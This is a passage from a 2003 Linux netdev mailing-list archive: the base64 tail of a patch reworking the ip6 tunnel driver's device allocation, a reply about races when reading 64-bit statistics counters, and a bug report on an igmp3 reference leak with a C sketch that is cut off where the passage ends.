aWQgaXA2aXA2X3RubF9kZXZfc2V0dXAoc3RydWN0IG5ldF9kZXZpY2UgKmRl dik7DQogDQogLyogdGhlIElQdjYgdHVubmVsIGZhbGxiYWNrIGRldmljZSAq Lw0KLXN0YXRpYyBzdHJ1Y3QgbmV0X2RldmljZSBpcDZpcDZfZmJfdG5sX2Rl diA9IHsNCi0JLm5hbWUgPSAiaXA2dG5sMCIsDQotCS5pbml0ID0gaXA2aXA2 X2ZiX3RubF9kZXZfaW5pdA0KLX07DQorc3RhdGljIHN0cnVjdCBuZXRfZGV2 aWNlICppcDZpcDZfZmJfdG5sX2RldjsNCiANCi0vKiB0aGUgSVB2NiBmYWxs YmFjayB0dW5uZWwgKi8NCi1zdGF0aWMgc3RydWN0IGlwNl90bmwgaXA2aXA2 X2ZiX3RubCA9IHsNCi0JLmRldiA9ICZpcDZpcDZfZmJfdG5sX2RldiwNCi0J LnBhcm1zID17Lm5hbWUgPSAiaXA2dG5sMCIsIC5wcm90byA9IElQUFJPVE9f SVBWNn0NCi19Ow0KIA0KIC8qIGxpc3RzIGZvciBzdG9yaW5nIHR1bm5lbHMg 
aW4gdXNlICovDQogc3RhdGljIHN0cnVjdCBpcDZfdG5sICp0bmxzX3JfbFtI QVNIX1NJWkVdOw0KQEAgLTIxNiw1OSArMjA5LDM5IEBADQogaXA2X3RubF9j cmVhdGUoc3RydWN0IGlwNl90bmxfcGFybSAqcCwgc3RydWN0IGlwNl90bmwg KipwdCkNCiB7DQogCXN0cnVjdCBuZXRfZGV2aWNlICpkZXY7DQotCWludCBl cnIgPSAtRU5PQlVGUzsNCiAJc3RydWN0IGlwNl90bmwgKnQ7DQorCWNoYXIg bmFtZVtJRk5BTVNJWl07DQorCWludCBlcnI7DQogDQotCWRldiA9IGttYWxs b2Moc2l6ZW9mICgqZGV2KSArIHNpemVvZiAoKnQpLCBHRlBfS0VSTkVMKTsN Ci0JaWYgKCFkZXYpDQotCQlyZXR1cm4gZXJyOw0KKwlpZiAocC0+bmFtZVsw XSkgew0KKwkJc3RybGNweShuYW1lLCBwLT5uYW1lLCBJRk5BTVNJWik7DQor CX0gZWxzZSB7DQorCQlpbnQgaTsNCisJCWZvciAoaSA9IDE7IGkgPCBJUDZf VE5MX01BWDsgaSsrKSB7DQorCQkJc3ByaW50ZihuYW1lLCAiaXA2dG5sJWQi LCBpKTsNCisJCQlpZiAoX19kZXZfZ2V0X2J5X25hbWUobmFtZSkgPT0gTlVM TCkNCisJCQkJYnJlYWs7DQorCQl9DQorCQlpZiAoaSA9PSBJUDZfVE5MX01B WCkgDQorCQkJcmV0dXJuIC1FTk9CVUZTOw0KKwl9DQorCWRldiA9IGFsbG9j X25ldGRldihzaXplb2YgKCp0KSwgbmFtZSwgaXA2aXA2X3RubF9kZXZfc2V0 dXApOw0KKwlpZiAoZGV2ID09IE5VTEwpDQorCQlyZXR1cm4gLUVOT01FTTsN CiANCi0JbWVtc2V0KGRldiwgMCwgc2l6ZW9mICgqZGV2KSArIHNpemVvZiAo KnQpKTsNCi0JZGV2LT5wcml2ID0gKHZvaWQgKikgKGRldiArIDEpOw0KLQl0 ID0gKHN0cnVjdCBpcDZfdG5sICopIGRldi0+cHJpdjsNCi0JdC0+ZGV2ID0g ZGV2Ow0KKwl0ID0gZGV2LT5wcml2Ow0KIAlkZXYtPmluaXQgPSBpcDZpcDZf dG5sX2Rldl9pbml0Ow0KLQltZW1jcHkoJnQtPnBhcm1zLCBwLCBzaXplb2Yg KCpwKSk7DQotCXQtPnBhcm1zLm5hbWVbSUZOQU1TSVogLSAxXSA9ICdcMCc7 DQotCXN0cmNweShkZXYtPm5hbWUsIHQtPnBhcm1zLm5hbWUpOw0KLQlpZiAo IWRldi0+bmFtZVswXSkgew0KLQkJaW50IGkgPSAwOw0KLQkJaW50IGV4aXN0 cyA9IDA7DQotDQotCQlkbyB7DQotCQkJc3ByaW50ZihkZXYtPm5hbWUsICJp cDZ0bmwlZCIsICsraSk7DQotCQkJZXhpc3RzID0gKF9fZGV2X2dldF9ieV9u YW1lKGRldi0+bmFtZSkgIT0gTlVMTCk7DQotCQl9IHdoaWxlIChpIDwgSVA2 X1ROTF9NQVggJiYgZXhpc3RzKTsNCisJdC0+cGFybXMgPSAqcDsNCiANCi0J CWlmIChpID09IElQNl9UTkxfTUFYKSB7DQotCQkJZ290byBmYWlsZWQ7DQot CQl9DQotCQltZW1jcHkodC0+cGFybXMubmFtZSwgZGV2LT5uYW1lLCBJRk5B TVNJWik7DQotCX0NCi0JU0VUX01PRFVMRV9PV05FUihkZXYpOw0KIAlpZiAo KGVyciA9IHJlZ2lzdGVyX25ldGRldmljZShkZXYpKSA8IDApIHsNCi0JCWdv 
dG8gZmFpbGVkOw0KKwkJa2ZyZWUoZGV2KTsNCisJCXJldHVybiBlcnI7DQog CX0NCisJZGV2X2hvbGQoZGV2KTsNCisNCiAJaXA2aXA2X3RubF9saW5rKHQp Ow0KIAkqcHQgPSB0Ow0KIAlyZXR1cm4gMDsNCi1mYWlsZWQ6DQotCWtmcmVl KGRldik7DQotCXJldHVybiBlcnI7DQotfQ0KLQ0KLS8qKg0KLSAqIGlwNl90 bmxfZGVzdHJveSgpIC0gZGVzdHJveSBvbGQgdHVubmVsDQotICogICBAdDog dHVubmVsIHRvIGJlIGRlc3Ryb3llZA0KLSAqDQotICogUmV0dXJuOg0KLSAq ICAgd2hhdGV2ZXIgdW5yZWdpc3Rlcl9uZXRkZXZpY2UoKSByZXR1cm5zDQot ICoqLw0KLQ0KLXN0YXRpYyBpbmxpbmUgaW50DQotaXA2X3RubF9kZXN0cm95 KHN0cnVjdCBpcDZfdG5sICp0KQ0KLXsNCi0JcmV0dXJuIHVucmVnaXN0ZXJf bmV0ZGV2aWNlKHQtPmRldik7DQogfQ0KIA0KIC8qKg0KQEAgLTMwNCwyNCAr Mjc3LDEzIEBADQogCQkJcmV0dXJuIChjcmVhdGUgPyAtRUVYSVNUIDogMCk7 DQogCQl9DQogCX0NCi0JaWYgKCFjcmVhdGUpIHsNCisJaWYgKCFjcmVhdGUp DQogCQlyZXR1cm4gLUVOT0RFVjsNCi0JfQ0KKwkNCiAJcmV0dXJuIGlwNl90 bmxfY3JlYXRlKHAsIHB0KTsNCiB9DQogDQogLyoqDQotICogaXA2aXA2X3Ru bF9kZXZfZGVzdHJ1Y3RvciAtIHR1bm5lbCBkZXZpY2UgZGVzdHJ1Y3Rvcg0K LSAqICAgQGRldjogdGhlIGRldmljZSB0byBiZSBkZXN0cm95ZWQNCi0gKiov DQotDQotc3RhdGljIHZvaWQNCi1pcDZpcDZfdG5sX2Rldl9kZXN0cnVjdG9y KHN0cnVjdCBuZXRfZGV2aWNlICpkZXYpDQotew0KLQlrZnJlZShkZXYpOw0K LX0NCi0NCi0vKioNCiAgKiBpcDZpcDZfdG5sX2Rldl91bmluaXQgLSB0dW5u ZWwgZGV2aWNlIHVuaW5pdGlhbGl6ZXINCiAgKiAgIEBkZXY6IHRoZSBkZXZp Y2UgdG8gYmUgZGVzdHJveWVkDQogICogICANCkBAIC0zMzIsMTQgKzI5NCwx NCBAQA0KIHN0YXRpYyB2b2lkDQogaXA2aXA2X3RubF9kZXZfdW5pbml0KHN0 cnVjdCBuZXRfZGV2aWNlICpkZXYpDQogew0KLQlpZiAoZGV2ID09ICZpcDZp cDZfZmJfdG5sX2Rldikgew0KKwlpZiAoZGV2ID09IGlwNmlwNl9mYl90bmxf ZGV2KSB7DQogCQl3cml0ZV9sb2NrX2JoKCZpcDZpcDZfbG9jayk7DQogCQl0 bmxzX3djWzBdID0gTlVMTDsNCiAJCXdyaXRlX3VubG9ja19iaCgmaXA2aXA2 X2xvY2spOw0KIAl9IGVsc2Ugew0KLQkJc3RydWN0IGlwNl90bmwgKnQgPSAo c3RydWN0IGlwNl90bmwgKikgZGV2LT5wcml2Ow0KLQkJaXA2aXA2X3RubF91 bmxpbmsodCk7DQorCQlpcDZpcDZfdG5sX3VubGluaygoc3RydWN0IGlwNl90 bmwgKikgZGV2LT5wcml2KTsNCiAJfQ0KKwlkZXZfcHV0KGRldik7DQogfQ0K IA0KIC8qKg0KQEAgLTg3OCw3ICs4NDAsNiBAQA0KIAl9DQogfQ0KIA0KLQ0K IHN0YXRpYyB2b2lkIGlwNmlwNl90bmxfbGlua19jb25maWcoc3RydWN0IGlw 
Nl90bmwgKnQpDQogew0KIAlzdHJ1Y3QgbmV0X2RldmljZSAqZGV2ID0gdC0+ ZGV2Ow0KQEAgLTkwNiwzMSArODY3LDI1IEBADQogCWlmIChwLT5mbGFncyAm IElQNl9UTkxfRl9DQVBfWE1JVCkgew0KIAkJc3RydWN0IHJ0Nl9pbmZvICpy dCA9IHJ0Nl9sb29rdXAoJnAtPnJhZGRyLCAmcC0+bGFkZHIsDQogCQkJCQkJ IHAtPmxpbmssIDApOw0KLQkJaWYgKHJ0KSB7DQotCQkJc3RydWN0IG5ldF9k ZXZpY2UgKnJ0ZGV2Ow0KLQkJCWlmICghKHJ0ZGV2ID0gcnQtPnJ0NmlfZGV2 KSB8fA0KLQkJCSAgICBydGRldi0+dHlwZSA9PSBBUlBIUkRfVFVOTkVMNikg ew0KLQkJCQkvKiBhcyBsb25nIGFzIHR1bm5lbHMgdXNlIHRoZSBzYW1lIHNv Y2tldCANCi0JCQkJICAgZm9yIHRyYW5zbWlzc2lvbiwgbG9jYWxseSBuZXN0 ZWQgdHVubmVscyANCi0JCQkJICAgd29uJ3Qgd29yayAqLw0KLQkJCQlkc3Rf cmVsZWFzZSgmcnQtPnUuZHN0KTsNCi0JCQkJZ290byBub19saW5rOw0KLQkJ CX0gZWxzZSB7DQotCQkJCWRldi0+aWZsaW5rID0gcnRkZXYtPmlmaW5kZXg7 DQotCQkJCWRldi0+aGFyZF9oZWFkZXJfbGVuID0gcnRkZXYtPmhhcmRfaGVh ZGVyX2xlbiArDQotCQkJCQlzaXplb2YgKHN0cnVjdCBpcHY2aGRyKTsNCi0J CQkJZGV2LT5tdHUgPSBydGRldi0+bXR1IC0gc2l6ZW9mIChzdHJ1Y3QgaXB2 Nmhkcik7DQotCQkJCWlmIChkZXYtPm10dSA8IElQVjZfTUlOX01UVSkNCi0J CQkJCWRldi0+bXR1ID0gSVBWNl9NSU5fTVRVOw0KLQkJCQkNCi0JCQkJZHN0 X3JlbGVhc2UoJnJ0LT51LmRzdCk7DQotCQkJfQ0KKw0KKwkJaWYgKHJ0ID09 IE5VTEwpDQorCQkJcmV0dXJuOw0KKw0KKwkJLyogYXMgbG9uZyBhcyB0dW5u ZWxzIHVzZSB0aGUgc2FtZSBzb2NrZXQgZm9yIHRyYW5zbWlzc2lvbiwNCisJ CSAgIGxvY2FsbHkgbmVzdGVkIHR1bm5lbHMgd29uJ3Qgd29yayAqLw0KKwkJ DQorCQlpZiAocnQtPnJ0NmlfZGV2ICYmIHJ0LT5ydDZpX2Rldi0+dHlwZSAh PSBBUlBIUkRfVFVOTkVMNikgew0KKwkJCWRldi0+aWZsaW5rID0gcnQtPnJ0 NmlfZGV2LT5pZmluZGV4Ow0KKw0KKwkJCWRldi0+aGFyZF9oZWFkZXJfbGVu ID0gcnQtPnJ0NmlfZGV2LT5oYXJkX2hlYWRlcl9sZW4gKw0KKwkJCQlzaXpl b2YgKHN0cnVjdCBpcHY2aGRyKTsNCisNCisJCQlkZXYtPm10dSA9IHJ0LT5y dDZpX2Rldi0+bXR1IC0gc2l6ZW9mIChzdHJ1Y3QgaXB2Nmhkcik7DQorDQor CQkJaWYgKGRldi0+bXR1IDwgSVBWNl9NSU5fTVRVKQ0KKwkJCQlkZXYtPm10 dSA9IElQVjZfTUlOX01UVTsNCiAJCX0NCi0JfSBlbHNlIHsNCi0Jbm9fbGlu azoNCi0JCWRldi0+aWZsaW5rID0gMDsNCi0JCWRldi0+aGFyZF9oZWFkZXJf bGVuID0gTExfTUFYX0hFQURFUiArIHNpemVvZiAoc3RydWN0IGlwdjZoZHIp Ow0KLQkJZGV2LT5tdHUgPSBFVEhfREFUQV9MRU4gLSBzaXplb2YgKHN0cnVj 
dCBpcHY2aGRyKTsNCisJCWRzdF9yZWxlYXNlKCZydC0+dS5kc3QpOw0KIAl9 DQogfQ0KIA0KQEAgLTk5NSw3ICs5NTAsNyBAQA0KIA0KIAlzd2l0Y2ggKGNt ZCkgew0KIAljYXNlIFNJT0NHRVRUVU5ORUw6DQotCQlpZiAoZGV2ID09ICZp cDZpcDZfZmJfdG5sX2Rldikgew0KKwkJaWYgKGRldiA9PSBpcDZpcDZfZmJf dG5sX2Rldikgew0KIAkJCWlmIChjb3B5X2Zyb21fdXNlcigmcCwNCiAJCQkJ CSAgIGlmci0+aWZyX2lmcnUuaWZydV9kYXRhLA0KIAkJCQkJICAgc2l6ZW9m IChwKSkpIHsNCkBAIC0xMDI0LDcgKzk3OSw3IEBADQogCQkJZXJyID0gLUVG QVVMVDsNCiAJCQlicmVhazsNCiAJCX0NCi0JCWlmICghY3JlYXRlICYmIGRl diAhPSAmaXA2aXA2X2ZiX3RubF9kZXYpIHsNCisJCWlmICghY3JlYXRlICYm IGRldiAhPSBpcDZpcDZfZmJfdG5sX2Rldikgew0KIAkJCXQgPSAoc3RydWN0 IGlwNl90bmwgKikgZGV2LT5wcml2Ow0KIAkJfQ0KIAkJaWYgKCF0ICYmIChl cnIgPSBpcDZpcDZfdG5sX2xvY2F0ZSgmcCwgJnQsIGNyZWF0ZSkpKSB7DQpA QCAtMTA1Miw3ICsxMDA3LDcgQEANCiAJCWlmICghY2FwYWJsZShDQVBfTkVU X0FETUlOKSkNCiAJCQlicmVhazsNCiANCi0JCWlmIChkZXYgPT0gJmlwNmlw Nl9mYl90bmxfZGV2KSB7DQorCQlpZiAoZGV2ID09IGlwNmlwNl9mYl90bmxf ZGV2KSB7DQogCQkJaWYgKGNvcHlfZnJvbV91c2VyKCZwLCBpZnItPmlmcl9p ZnJ1LmlmcnVfZGF0YSwNCiAJCQkJCSAgIHNpemVvZiAocCkpKSB7DQogCQkJ CWVyciA9IC1FRkFVTFQ7DQpAQCAtMTA2MSwxNCArMTAxNiwxNCBAQA0KIAkJ CWVyciA9IGlwNmlwNl90bmxfbG9jYXRlKCZwLCAmdCwgMCk7DQogCQkJaWYg KGVycikNCiAJCQkJYnJlYWs7DQotCQkJaWYgKHQgPT0gJmlwNmlwNl9mYl90 bmwpIHsNCisJCQlpZiAodCA9PSBpcDZpcDZfZmJfdG5sX2Rldi0+cHJpdikg ew0KIAkJCQllcnIgPSAtRVBFUk07DQogCQkJCWJyZWFrOw0KIAkJCX0NCiAJ CX0gZWxzZSB7DQogCQkJdCA9IChzdHJ1Y3QgaXA2X3RubCAqKSBkZXYtPnBy aXY7DQogCQl9DQotCQllcnIgPSBpcDZfdG5sX2Rlc3Ryb3kodCk7DQorCQll cnIgPSB1bnJlZ2lzdGVyX25ldGRldmljZSh0LT5kZXYpOw0KIAkJYnJlYWs7 DQogCWRlZmF1bHQ6DQogCQllcnIgPSAtRUlOVkFMOw0KQEAgLTExMTAsNDAg KzEwNjUsNDkgQEANCiB9DQogDQogLyoqDQotICogaXA2aXA2X3RubF9kZXZf aW5pdF9nZW4gLSBnZW5lcmFsIGluaXRpYWxpemVyIGZvciBhbGwgdHVubmVs IGRldmljZXMNCisgKiBpcDZpcDZfdG5sX2Rldl9zZXR1cCAtIHNldHVwIHZp cnR1YWwgdHVubmVsIGRldmljZQ0KICAqICAgQGRldjogdmlydHVhbCBkZXZp Y2UgYXNzb2NpYXRlZCB3aXRoIHR1bm5lbA0KICAqDQogICogRGVzY3JpcHRp b246DQotICogICBTZXQgZnVuY3Rpb24gcG9pbnRlcnMgYW5kIGluaXRpYWxp 
emUgdGhlICZzdHJ1Y3QgZmxvd2kgdGVtcGxhdGUgdXNlZA0KLSAqICAgYnkg dGhlIHR1bm5lbC4NCisgKiAgIEluaXRpYWxpemUgZnVuY3Rpb24gcG9pbnRl cnMgYW5kIGRldmljZSBwYXJhbWV0ZXJzDQogICoqLw0KIA0KLXN0YXRpYyB2 b2lkDQotaXA2aXA2X3RubF9kZXZfaW5pdF9nZW4oc3RydWN0IG5ldF9kZXZp Y2UgKmRldikNCitzdGF0aWMgdm9pZCBpcDZpcDZfdG5sX2Rldl9zZXR1cChz dHJ1Y3QgbmV0X2RldmljZSAqZGV2KQ0KIHsNCi0Jc3RydWN0IGlwNl90bmwg KnQgPSAoc3RydWN0IGlwNl90bmwgKikgZGV2LT5wcml2Ow0KLQlzdHJ1Y3Qg Zmxvd2kgKmZsID0gJnQtPmZsOw0KLQ0KLQltZW1zZXQoZmwsIDAsIHNpemVv ZiAoKmZsKSk7DQotCWZsLT5wcm90byA9IElQUFJPVE9fSVBWNjsNCi0NCi0J ZGV2LT5kZXN0cnVjdG9yID0gaXA2aXA2X3RubF9kZXZfZGVzdHJ1Y3RvcjsN CisJU0VUX01PRFVMRV9PV05FUihkZXYpOw0KIAlkZXYtPnVuaW5pdCA9IGlw NmlwNl90bmxfZGV2X3VuaW5pdDsNCisJZGV2LT5kZXN0cnVjdG9yID0gKHZv aWQgKCopKHN0cnVjdCBuZXRfZGV2aWNlICopKWtmcmVlOw0KIAlkZXYtPmhh cmRfc3RhcnRfeG1pdCA9IGlwNmlwNl90bmxfeG1pdDsNCiAJZGV2LT5nZXRf c3RhdHMgPSBpcDZpcDZfdG5sX2dldF9zdGF0czsNCiAJZGV2LT5kb19pb2N0 bCA9IGlwNmlwNl90bmxfaW9jdGw7DQogCWRldi0+Y2hhbmdlX210dSA9IGlw NmlwNl90bmxfY2hhbmdlX210dTsNCisNCiAJZGV2LT50eXBlID0gQVJQSFJE X1RVTk5FTDY7DQorCWRldi0+aGFyZF9oZWFkZXJfbGVuID0gTExfTUFYX0hF QURFUiArIHNpemVvZiAoc3RydWN0IGlwdjZoZHIpOw0KKwlkZXYtPm10dSA9 IEVUSF9EQVRBX0xFTiAtIHNpemVvZiAoc3RydWN0IGlwdjZoZHIpOw0KIAlk ZXYtPmZsYWdzIHw9IElGRl9OT0FSUDsNCi0JaWYgKGlwdjZfYWRkcl90eXBl KCZ0LT5wYXJtcy5yYWRkcikgJiBJUFY2X0FERFJfVU5JQ0FTVCAmJg0KLQkg ICAgaXB2Nl9hZGRyX3R5cGUoJnQtPnBhcm1zLmxhZGRyKSAmIElQVjZfQURE Ul9VTklDQVNUKQ0KLQkJZGV2LT5mbGFncyB8PSBJRkZfUE9JTlRPUE9JTlQ7 DQotCS8qIEhtbS4uLiBNQVhfQUREUl9MRU4gaXMgOCwgc28gdGhlIGlwdjYg YWRkcmVzc2VzIGNhbid0IGJlIA0KKwlkZXYtPmlmbGluayA9IDA7DQorCS8q IEhtbS4uLiBNQVhfQUREUl9MRU4gaXMgOCwgc28gdGhlIGlwdjYgYWRkcmVz c2VzIGNhbid0IGJlDQogCSAgIGNvcGllZCB0byBkZXYtPmRldl9hZGRyIGFu ZCBkZXYtPmJyb2FkY2FzdCwgbGlrZSB0aGUgaXB2NA0KIAkgICBhZGRyZXNz ZXMgd2VyZSBpbiBpcGlwLmMsIGlwX2dyZS5jIGFuZCBzaXQuYy4gKi8NCiAJ ZGV2LT5hZGRyX2xlbiA9IDA7DQogfQ0KIA0KKw0KKy8qKg0KKyAqIGlwNmlw Nl90bmxfZGV2X2luaXRfZ2VuIC0gZ2VuZXJhbCBpbml0aWFsaXplciBmb3Ig 
YWxsIHR1bm5lbCBkZXZpY2VzDQorICogICBAZGV2OiB2aXJ0dWFsIGRldmlj ZSBhc3NvY2lhdGVkIHdpdGggdHVubmVsDQorICoqLw0KKw0KK3N0YXRpYyBp bmxpbmUgdm9pZA0KK2lwNmlwNl90bmxfZGV2X2luaXRfZ2VuKHN0cnVjdCBu ZXRfZGV2aWNlICpkZXYpDQorew0KKwlzdHJ1Y3QgaXA2X3RubCAqdCA9IChz dHJ1Y3QgaXA2X3RubCAqKSBkZXYtPnByaXY7DQorCXQtPmZsLnByb3RvID0g SVBQUk9UT19JUFY2Ow0KKwl0LT5kZXYgPSBkZXY7DQorCXN0cmNweSh0LT5w YXJtcy5uYW1lLCBkZXYtPm5hbWUpOw0KK30NCisNCiAvKioNCiAgKiBpcDZp cDZfdG5sX2Rldl9pbml0IC0gaW5pdGlhbGl6ZXIgZm9yIGFsbCBub24gZmFs bGJhY2sgdHVubmVsIGRldmljZXMNCiAgKiAgIEBkZXY6IHZpcnR1YWwgZGV2 aWNlIGFzc29jaWF0ZWQgd2l0aCB0dW5uZWwNCkBAIC0xMTY3LDggKzExMzEs MTAgQEANCiANCiBpbnQgaXA2aXA2X2ZiX3RubF9kZXZfaW5pdChzdHJ1Y3Qg bmV0X2RldmljZSAqZGV2KQ0KIHsNCi0JaXA2aXA2X3RubF9kZXZfaW5pdF9n ZW4oZGV2KTsNCi0JdG5sc193Y1swXSA9ICZpcDZpcDZfZmJfdG5sOw0KKwlz dHJ1Y3QgaXA2X3RubCAqdCA9IGRldi0+cHJpdjsNCisJaXA2aXA2X3RubF9k ZXZfaW5pdF9nZW4oZGV2KTsgDQorCWRldl9ob2xkKGRldik7DQorCXRubHNf d2NbMF0gPSB0Ow0KIAlyZXR1cm4gMDsNCiB9DQogDQpAQCAtMTE5MCw4ICsx MTU2LDYgQEANCiAJc3RydWN0IHNvY2sgKnNrOw0KIAlzdHJ1Y3QgaXB2Nl9w aW5mbyAqbnA7DQogDQotCWlwNmlwNl9mYl90bmxfZGV2LnByaXYgPSAodm9p ZCAqKSAmaXA2aXA2X2ZiX3RubDsNCi0NCiAJZm9yIChpID0gMDsgaSA8IE5S X0NQVVM7IGkrKykgew0KIAkJaWYgKCFjcHVfcG9zc2libGUoaSkpDQogCQkJ Y29udGludWU7DQpAQCAtMTIxOSwxMCArMTE4MywyMyBAQA0KIAkJZ290byBm YWlsOw0KIAl9DQogDQotCVNFVF9NT0RVTEVfT1dORVIoJmlwNmlwNl9mYl90 bmxfZGV2KTsNCi0JcmVnaXN0ZXJfbmV0ZGV2KCZpcDZpcDZfZmJfdG5sX2Rl dik7DQotDQorCQ0KKwlpcDZpcDZfZmJfdG5sX2RldiA9IGFsbG9jX25ldGRl dihzaXplb2Yoc3RydWN0IGlwNl90bmwpLCAiaXA2dG5sMCIsDQorCQkJCQkg aXA2aXA2X3RubF9kZXZfc2V0dXApOw0KKw0KKwlpZiAoIWlwNmlwNl9mYl90 bmxfZGV2KSB7DQorCQllcnIgPSAtRU5PTUVNOw0KKwkJZ290byB0bmxfZmFp bDsNCisJfQ0KKwlpcDZpcDZfZmJfdG5sX2Rldi0+aW5pdCA9IGlwNmlwNl9m Yl90bmxfZGV2X2luaXQ7DQorDQorCWlmICgoZXJyID0gcmVnaXN0ZXJfbmV0 ZGV2KGlwNmlwNl9mYl90bmxfZGV2KSkpIHsNCisJCWtmcmVlKGlwNmlwNl9m Yl90bmxfZGV2KTsNCisJCWdvdG8gdG5sX2ZhaWw7DQorCX0NCiAJcmV0dXJu IDA7DQordG5sX2ZhaWw6DQorCWluZXQ2X2RlbF9wcm90b2NvbCgmaXA2aXA2 
X3Byb3RvY29sLCBJUFBST1RPX0lQVjYpOw0KIGZhaWw6DQogCWZvciAoaiA9 IDA7IGogPCBpOyBqKyspIHsNCiAJCWlmICghY3B1X3Bvc3NpYmxlKGopKQ0K QEAgLTEyNDEsNyArMTIxOCw3IEBADQogew0KIAlpbnQgaTsNCiANCi0JdW5y ZWdpc3Rlcl9uZXRkZXYoJmlwNmlwNl9mYl90bmxfZGV2KTsNCisJdW5yZWdp c3Rlcl9uZXRkZXYoaXA2aXA2X2ZiX3RubF9kZXYpOw0KIA0KIAlpbmV0Nl9k ZWxfcHJvdG9jb2woJmlwNmlwNl9wcm90b2NvbCwgSVBQUk9UT19JUFY2KTsN CiANCg== ---377318441-1068751107-1057349978=:16323-- From jeffpc@optonline.net Fri Jul 4 18:48:26 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 04 Jul 2003 18:48:32 -0700 (PDT) Received: from mta10.srv.hcvlny.cv.net (mta10.srv.hcvlny.cv.net [167.206.5.45]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h651mP2x016260 for ; Fri, 4 Jul 2003 18:48:26 -0700 Received: from asv13.srv.hcvlny.cv.net (asv13.srv.hcvlny.cv.net [167.206.5.147]) by mta10.srv.hcvlny.cv.net (iPlanet Messaging Server 5.2 HotFix 1.16 (built May 14 2003)) with ESMTP id <0HHI00FWKHW7LK@mta10.srv.hcvlny.cv.net> for netdev@oss.sgi.com; Fri, 04 Jul 2003 13:57:44 -0400 (EDT) Received: from jeff.home (ool-44c2049f.dyn.optonline.net [68.194.4.159]) by asv13.srv.hcvlny.cv.net (8.12.9/8.12.9) with ESMTP id h64HuatX016667; Fri, 04 Jul 2003 13:56:39 -0400 (EDT) Date: Fri, 04 Jul 2003 13:57:19 -0400 From: Jeff Sipek Subject: Re: [PATCH - RFC] [1/5] 64-bit network statistics - generic net In-reply-to: <20030704094745.GG29233@lug-owl.de> To: Jan-Benedict Glaw , Kernel Mailing List Cc: Andrew Morton , Dave Jones , Jeff Garzik , netdev@oss.sgi.com, Linus Torvalds Message-id: <200307041357.32871.jeffpc@optonline.net> MIME-version: 1.0 Content-type: Text/Plain; charset=iso-8859-1 Content-transfer-encoding: 7BIT Content-disposition: inline Content-description: clearsigned data User-Agent: KMail/1.5.2 References: <200307032231.39842.jeffpc@optonline.net> <20030704094745.GG29233@lug-owl.de> X-archive-position: 3763 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: 
jeffpc@optonline.net Precedence: bulk X-list: netdev
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Friday 04 July 2003 05:47, Jan-Benedict Glaw wrote:
> Well... I don't really like to break userspace, but why don't we simply
> make packet/traffic counters long long / u_int64_t? This way, we'd
> simply keep almost all drivers untouched and only need to fiddle with
> some sprints()/printk() statements?

I'm no hardware expert; however, that approach contains a potential race condition - not a system-critical one, but something we should be concerned about. If one cpu tries to read a u_int64_t variable while another tries to update it, the worst-case scenario is that the reader will get the high 32 bits from before the write and the low 32 bits from after the write. If the low 32 bits overflowed in that write, the number would be off by 4GB! (This only applies to 32-bit architectures.) True, there are cache coherency algorithms, etc...

> Really, how many programs use the current statistics? I'd prefer to
> modify them over adding strange patches like this one to the kernel...

I believe that on any kind of router someone will at some point want to know how much data was transferred.

Jeff.

- -- Keyboard not found!
Press F1 to enter Setup -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.2 (GNU/Linux) iD8DBQE/BcADwFP0+seVj/4RAq2TAKDS0oAnj0/PrCuPoxdQF0euBiy6LACeMHqk gWJhwub4y0VtQmC/hcevJB4= =RCSe -----END PGP SIGNATURE----- From chas@locutus.cmf.nrl.navy.mil Fri Jul 4 19:19:13 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 04 Jul 2003 19:19:18 -0700 (PDT) Received: from ginger.cmf.nrl.navy.mil (ginger.cmf.nrl.navy.mil [134.207.10.161]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h652JB2x016567 for ; Fri, 4 Jul 2003 19:19:12 -0700 Received: from locutus.cmf.nrl.navy.mil (locutus.cmf.nrl.navy.mil [134.207.10.66]) by ginger.cmf.nrl.navy.mil (8.12.7/8.12.7) with ESMTP id h652J7sG025618 for ; Fri, 4 Jul 2003 22:19:07 -0400 (EDT) Message-Id: <200307050219.h652J7sG025618@ginger.cmf.nrl.navy.mil> To: netdev@oss.sgi.com Subject: igmp3 and igmp_group_dropped() trouble? Reply-To: chas3@users.sourceforge.net Date: Fri, 04 Jul 2003 22:16:50 -0400 From: chas williams X-Spam-Score: (**) hits=2.5 X-Virus-Scanned: NAI Completed X-Scanned-By: MIMEDefang 2.30 (www . roaringpenguin . com / mimedefang) X-archive-position: 3764 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: chas@cmf.nrl.navy.mil Precedence: bulk X-list: netdev recently i noticed a little problem with my lane interfaces not being unregistered completely when i rmmod'ed the module -- it would stick with a single outstanding reference to the network device. also, if i kept ifup'ing/ifdown'ing, eventually i would get an oops in kernel/timer.c:377. i have tracked this down to a problem with igmp_group_dropped() and the newish (to me anyway) igmp3 support. 
during ip_mc_down(), it seems to be trying to stop all the timers and drop any refs that a timer might have to the inet device:

	in_dev->mr_ifc_count = 0;
	if (del_timer(&in_dev->mr_ifc_timer))
		__in_dev_put(in_dev);

then it goes on to delete the multicast groups:

	for (i=in_dev->mc_list; i; i=i->next)
		igmp_group_dropped(i);

unfortunately igmp_group_dropped() seems to schedule the mr_ifc_timer (via igmp_ifc_event) in an effort to inform the network it's no longer a member of the group (or so i think). this isn't a particular problem, except that the timers use __in_dev_put(), so if the timer is the last guy to dec the refcnt on the inet device, the inet destroy function is never called and inet never drops its last reference to the network interface.

i am guessing that ip_mc_down() is supposed to get the igmp stack to drop all references to the inet device. some possible solutions (assuming the above is correct):

in igmp_group_dropped() don't bother trying to send drop messages if !IFF_UP.

in ip_mc_down(), delete the mr_ifc_timer AFTER dropping the group membership. i guess i would lean toward this one. however, you might also need to delete the timer again in ip_mc_destroy_dev() since it also calls igmp_group_dropped() after it's too late to send anything to the network.
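
to make the ordering argument above concrete, here is a minimal userspace sketch. it is not kernel code: struct toy_in_dev and every toy_* function are hypothetical stand-ins, and the only thing modelled is "an armed timer holds one reference on the device". it does not model the timer expiry path or __in_dev_put() itself, only which order of "cancel timer" and "drop groups" leaves a reference behind.

```c
#include <stdbool.h>

/* Hypothetical toy model, not the kernel's struct in_device. */
struct toy_in_dev {
	int  refcnt;         /* references held on the device */
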